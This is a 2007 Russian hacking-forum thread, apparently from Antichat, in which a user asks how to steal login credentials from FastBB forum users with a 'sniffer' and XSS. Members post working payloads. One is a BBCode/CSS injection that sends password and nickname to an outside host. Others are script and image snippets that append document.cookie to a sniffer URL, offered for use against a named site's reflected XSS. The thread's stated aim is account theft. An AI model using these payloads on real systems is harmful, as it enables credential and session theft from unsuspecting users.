Принцип работы сниффера

Discussion in 'Песочница' started by Pashahak, 17 Jan 2007.

  1. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!
     
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Привет, пацан
    Принцип работы: http://ru.wikipedia.org/wiki/Sniffer
    Как правильно пользоваться: анализировать сетевой траффик.
    Правду ли тебе сказали: Да, правду.
    Читай тут http://old.antichat.ru/sniff/
     
  3. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Ну во первых ты выкладываешь не открытую ссылку на снифер а скрытую её в xss. Если XSS активная то любому пользователю достаточно просто прочитать сообщение чтобы хэш пришол на снифер. На снифер приходят все паоли от любых форумов самое главное составить правильно XSS большинство на снифер приходят пароли в зашифрованом виде типа md5 который потом можно расшифровать получив пароль из него.
     
  4. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил:

    [font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:document.images[1].src="http://s.netsec.ru//s.gif?id=79&"+pass+nick); ]][/font]

    но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить?
     
  5. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    1) форум скажи какой
    2) возможна эта хсс не под эту версию форума
     
  6. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Не судьба, значит. Ты этого просто не очень сильно хочешь.
     
  7. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Я просто не очень сильно знаю. Форум FastBB ( На Borda.ru )
     
  8. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    А еще одно: может кто-то обьяснить чайнику как пользоваться ScoopLm
     
  9. Retscan

    Retscan Member

    Joined:
    17 Dec 2006
    Messages:
    25
    Likes Received:
    9
    Reputations:
    11
    бронированный форум. Даже не думай :)
     
  10. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Вот тебе на, бронированный форум. Ну неужели ничего не можна сделать. Так давайте все по порядку. Пароли на FastBB храняться в открытом виде, это все знают, мне не нужна активная XSS мне и пассивной было бы вполне достаточно. Пожалуйста, мужики, подскажите где можна захомутать сниффера??? Век буду признателен!
     
  11. Skiba

    Skiba Banned

    Joined:
    19 Sep 2006
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    http://antichat.org/sniffer
     
  12. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Спасибо конечно что откликнулся, я этот сниффер видел уже, но легкомысленность ламерской души не имеет предела. Дело в том, что я не умею им пользоваться. Допустим я сделал сниффер с логином bla-bla. Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php. Но я не пойму, какую ссылку мне жертве показывать надобно, а по какой самому заходить? Может кто не матернеться мышленно, да потратить на мою маленькую персону минуту времени???
     
  13. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    По этой ссылке у тебя будут отчеты снифера!
    А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
     
  14. goffog

    goffog New Member

    Joined:
    6 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    тебе надо заходить на http://antichat.org/s/bla-bla/log.php, а жертве http://antichat.org/s/bla-blaю.gif, нотак ты увидишь только его IP а что б стірить кукисі читай темі про XSS
     
  15. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Pashahak

    Сразу на фастбб лезть - это жестоко =)
    Потренировался бы на более уязвимых...
    Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...
     
  16. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Что-то я не понимаю, при чем та ссылка именно к моему снифферу зарегеному, и как вообще инфо отправиться на мой сниффер bla-bla если в ней нету и намека на него?
     
  17. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Тьху мля как дела плохи, действительно, нус, что ж, мож кто прямую ссылочку на XSS для фастББ даст тупому ламеру?
     
  18. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Пацаны, а допустим есть XSS http://www.neora.ru/anketa/index.php?latter="><script>alert()</script> как ее перекрутить чтоб кукисы украсть с помощью высше описанного сниффера ( тут мне ничего не нужно, я только принцип узнать хочу ) Заранее спасибо.
     
  19. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    По теории вместо
    alert()
    ставишь
    img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;
     
  20. goffog

    goffog New Member

    Joined:
    6 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    <script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>